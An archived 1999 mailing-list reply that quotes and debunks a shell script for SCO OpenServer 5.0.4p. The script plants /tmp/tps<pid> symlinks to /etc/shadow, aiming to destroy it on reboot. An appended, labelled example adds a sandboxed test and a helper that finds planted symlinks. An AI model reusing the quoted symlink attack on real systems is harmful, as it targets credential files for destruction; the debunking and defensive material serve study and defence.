Re: Little exploit for startup scripts (SCO 5.0.4p).
Peter van Dijk (peter ATTIC.VUURWERK.NL)
Mon, 8 Mar 1999 08:43:15 +0100
- Next message: Detlef Hühnlein: "Call for Papers: CQRE"
- Previous message: Marc Heuse: "Re: Linux /usr/bin/gnuplot overflow"
- In reply to: leshka: "Little exploit for startup scripts (SCO 5.0.4p)."
- Next in thread: Taneli Leppä: "Re: Little exploit for startup scripts (SCO 5.0.4p)."
On Sun, Mar 07, 1999 at 03:07:23PM +0300, leshka wrote:
> #!/bin/sh
> #
> # ... The punishment for inobedience ...
> # (Cycle # 2)
> #
> # This simple script can help to erase any file
> # (SCO OpenServer Enterprise System v 5.0.4p).
Umm.. I don't think so...
> if [ _$1 = "_" ]
> then
> {
> echo -n "File to delete [/etc/shadow]:"
> read victim_file
> if [ _$victim_file = "_" ]
> then
> victim_file="/etc/shadow"
> fi
> }
> else
> victim_file=$1
> fi
nice.
> pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'`
nice.
> lastpid=`expr $pid - 30`
good thinking!
> while [ $pid != $lastpid ]
> do
> pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid
nice.
> done
> echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
No. rm -f removes just the symlink, not the target file.
Try this (tested on Linux, but SCO doesn't seem too broken to me):
# touch /etc/blah
$ ln -sf /etc/blah /tmp/blih
# rm -f /tmp/blih
# ls -al /etc/blah
-rw-r--r-- 1 root root 0 Mar 8 08:40 /etc/blah
Doesn't look very deleted to me...
Greetz, Peter.
--
.| Peter van Dijk          | <mo|VERWEG> getting stoned or coding
.| peter attic.vuurwerk.nl | <mo|VERWEG> that is the question of life
                           | <mo|VERWEG> coding or getting stoned
                           | <mo|VERWEG> getting stoned AND coding
                           | <mo|VERWEG> hmm
                           | <mo|VERWEG> then just get stoned and read slashdot :)
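
Added example, not part of the original message or of either poster's code: the reply's rm -f test made repeatable inside a private mktemp directory, plus a small audit helper that lists symlinks sitting under a predictable temp-file prefix such as /tmp/tps<pid>. The function names and sandbox file names are assumptions made for this illustration.

```sh
#!/bin/sh
# Constructed example: every path lives in a private mktemp directory.

# Repeat the reply's test: rm -f on a symlink unlinks the link itself,
# not the file it points to. Echoes "target-survived" or "target-removed".
rm_symlink_demo() {
    sandbox=$(mktemp -d) || return 1
    : > "$sandbox/blah"                     # stands in for /etc/blah
    ln -s "$sandbox/blah" "$sandbox/blih"   # stands in for /tmp/blih
    rm -f "$sandbox/blih"
    if [ -e "$sandbox/blah" ] && [ ! -L "$sandbox/blih" ]; then
        result=target-survived
    else
        result=target-removed
    fi
    rm -rf "$sandbox"
    echo "$result"
}

# Audit helper: print every symlink named <prefix>* in <dir> together
# with its target, so links planted under a predictable temp name
# stand out before a script touches them.
find_planted_links() {
    dir=$1
    prefix=$2
    for f in "$dir"/"$prefix"*; do
        [ -L "$f" ] || continue             # skip regular files and no-match
        printf '%s -> %s\n' "$f" "$(readlink "$f")"
    done
}

rm_symlink_demo
```
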